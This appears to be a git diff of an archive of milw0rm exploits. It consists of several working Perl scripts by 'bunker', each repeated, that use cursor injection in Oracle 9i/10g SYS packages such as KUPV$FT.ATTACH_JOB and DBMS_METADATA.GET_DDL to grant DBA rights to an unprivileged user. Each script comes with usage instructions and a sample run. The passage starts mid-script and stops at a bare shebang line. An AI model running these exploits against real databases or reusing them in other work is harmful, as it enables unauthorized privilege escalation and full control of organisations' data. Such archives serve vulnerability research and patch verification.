print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]

View file

@ -1,136 +1,136 @@
#!/usr/bin/perl
#
# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/bid/16294
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68.
# [-] Done!
#
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31626: job does not exist
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79
# ORA-06512: at "SYS.KUPV$FT", line 330
# ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user
# ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible
# ORA-00942: table or view does not exist
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE
# J BOOLEAN; R NUMBER;
# BEGIN
# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J);
# END;
# "] at kupv-ft_attach_jobV2.pl line 100.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
DECLARE
J BOOLEAN; R NUMBER;
BEGIN
R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J);
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]
#!/usr/bin/perl
#
# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/bid/16294
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68.
# [-] Done!
#
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31626: job does not exist
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79
# ORA-06512: at "SYS.KUPV$FT", line 330
# ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user
# ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible
# ORA-00942: table or view does not exist
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE
# J BOOLEAN; R NUMBER;
# BEGIN
# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J);
# END;
# "] at kupv-ft_attach_jobV2.pl line 100.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
DECLARE
J BOOLEAN; R NUMBER;
BEGIN
R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J);
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]

View file

@ -1,134 +1,134 @@
#!/usr/bin/perl
#
# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/bid/16287
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69.
# [-] Done!
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL
# ORA-06512: at "SYS.DBMS_METADATA", line 2576
# ORA-06512: at "SYS.DBMS_METADATA", line 2627
# ORA-06512: at "SYS.DBMS_METADATA", line 4220
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE
# R CLOB;
# BEGIN
# R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''','');
# END;
# "] at dbms_meta_get_ddlV2.pl line 101.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
DECLARE
R CLOB;
BEGIN
R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''','');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]
#!/usr/bin/perl
#
# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/bid/16287
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69.
# [-] Done!
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL
# ORA-06512: at "SYS.DBMS_METADATA", line 2576
# ORA-06512: at "SYS.DBMS_METADATA", line 2627
# ORA-06512: at "SYS.DBMS_METADATA", line 4220
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE
# R CLOB;
# BEGIN
# R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''','');
# END;
# "] at dbms_meta_get_ddlV2.pl line 101.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
DECLARE
R CLOB;
BEGIN
R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''','');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]

View file

@ -1,129 +1,129 @@
#!/usr/bin/perl
#
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/396133
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92.
# [-] Done!
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||''');
# END;
# "] at dbms_cdc_subscribeV2.pl line 122.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||''');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]
#!/usr/bin/perl
#
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/396133
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92.
# [-] Done!
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||''');
# END;
# "] at dbms_cdc_subscribeV2.pl line 122.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||''');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-02-26]

View file

@ -1,128 +1,128 @@
#!/usr/bin/perl
#
# Remote Oracle KUPM$MCP.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.red-database-security.com/
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104.
# [-] Done!
#
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil cursor...
# Cursor: 2
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END;
# "] at kupm-mcpmainV2.pl line 134.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
} );
$sth->execute;
my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
}
$sth->finish;
print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{
BEGIN
SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END;
});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
# milw0rm.com [2007-03-27]
#!/usr/bin/perl
